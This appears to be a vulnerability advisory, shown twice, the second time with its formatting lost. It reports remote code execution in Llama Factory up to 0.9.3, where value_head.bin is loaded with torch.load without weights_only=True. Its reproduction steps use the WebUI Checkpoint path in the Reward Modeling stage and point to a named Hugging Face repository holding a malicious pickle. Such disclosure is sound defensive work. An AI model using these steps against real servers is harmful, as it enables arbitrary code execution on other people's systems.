Summary
A critical remote code execution vulnerability was discovered during the Llama Factory training process. This vulnerability arises because the vhead_file is loaded without proper safeguards, allowing malicious attackers to execute arbitrary malicious code on the host system simply by passing a malicious Checkpoint path parameter through the WebUI interface. The attack is stealthy, as the victim remains unaware of the exploitation. The root cause is that the vhead_file argument is loaded without the secure parameter weights_only=True.
Note: In torch versions <2.6, the default setting is weights_only=False, and Llama Factory's setup.py only requires torch>=2.0.0.
Affected Version
Llama Factory versions <=0.9.3(latest) are affected by this vulnerability.
Details
- In LLaMA Factory's WebUI, when a user sets the
Checkpoint path, it modifies the adapter_name_or_path parameter passed to the training process.
code in src/llamafactory/webui/runner.py
- The
adapter_name_or_path passed to the training process is then used in src/llamafactory/model/model_utils/valuehead.py to fetch the corresponding value_head.bin file from Hugging Face. This file is subsequently loaded via torch.load() without the security parameter weights_only=True being set, resulting in remote code execution.
code in src/llamafactory/model/model_utils/valuehead.py
PoC
Steps to Reproduce
- Deploy llama factory.
- Remote attack through the WebUI interface
- Configure
Model name and Model path correctly. For demonstration purposes, we'll use a small model llamafactory/tiny-random-Llama-3 to accelerate model loading.
- Set
Finetuning method to LoRA and Train Stage to Reward Modeling. The vulnerability is specifically triggered during the Reward Modeling training stage.
- Input a malicious Hugging Face path in
Checkpoint path – here we use paulinsider/llamafactory-hack. This repository(https://huggingface.co/paulinsider/llamafactory-hack/tree/main ) contains a malicious value_head.bin file. The generation method for this file is as follows (it can execute arbitrary attack commands; for demonstration, we configured it to create a HACKED! folder).
- Click
Start to begin training. After a brief wait, a HACKED! folder will be created on the server. Note that arbitrary malicious code could be executed through this method.
The video demonstration of the vulnerability exploitation is available at the Google Drive Link
Impact
Exploitation of this vulnerability allows remote attackers to:
●Execute arbitrary malicious code / OS commands on the server.
●Potentially compromise sensitive data or escalate privileges.
●Deploy malware or create persistent backdoors in the system.
This significantly increases the risk of data breaches and operational disruption.
Summary
A critical remote code execution vulnerability was discovered during the Llama Factory training process. This vulnerability arises because the
vhead_fileis loaded without proper safeguards, allowing malicious attackers to execute arbitrary malicious code on the host system simply by passing a maliciousCheckpoint pathparameter through theWebUIinterface. The attack is stealthy, as the victim remains unaware of the exploitation. The root cause is that thevhead_fileargument is loaded without the secure parameterweights_only=True.Note: In torch versions <2.6, the default setting is
weights_only=False, and Llama Factory'ssetup.pyonly requirestorch>=2.0.0.Affected Version
Llama Factory versions <=0.9.3(latest) are affected by this vulnerability.
Details
Checkpoint path, it modifies theadapter_name_or_pathparameter passed to the training process.code in src/llamafactory/webui/runner.py
adapter_name_or_pathpassed to the training process is then used insrc/llamafactory/model/model_utils/valuehead.pyto fetch the correspondingvalue_head.binfile from Hugging Face. This file is subsequently loaded viatorch.load()without the security parameterweights_only=Truebeing set, resulting in remote code execution.code in src/llamafactory/model/model_utils/valuehead.py
PoC
Steps to Reproduce
Model nameandModel pathcorrectly. For demonstration purposes, we'll use a small modelllamafactory/tiny-random-Llama-3to accelerate model loading.Finetuning methodtoLoRAandTrain StagetoReward Modeling. The vulnerability is specifically triggered during the Reward Modeling training stage.Checkpoint path– here we usepaulinsider/llamafactory-hack. This repository(https://huggingface.co/paulinsider/llamafactory-hack/tree/main ) contains a maliciousvalue_head.binfile. The generation method for this file is as follows (it can execute arbitrary attack commands; for demonstration, we configured it to create aHACKED!folder).Startto begin training. After a brief wait, aHACKED!folder will be created on the server. Note that arbitrary malicious code could be executed through this method.The video demonstration of the vulnerability exploitation is available at the Google Drive Link
Impact
Exploitation of this vulnerability allows remote attackers to:
●Execute arbitrary malicious code / OS commands on the server.
●Potentially compromise sensitive data or escalate privileges.
●Deploy malware or create persistent backdoors in the system.
This significantly increases the risk of data breaches and operational disruption.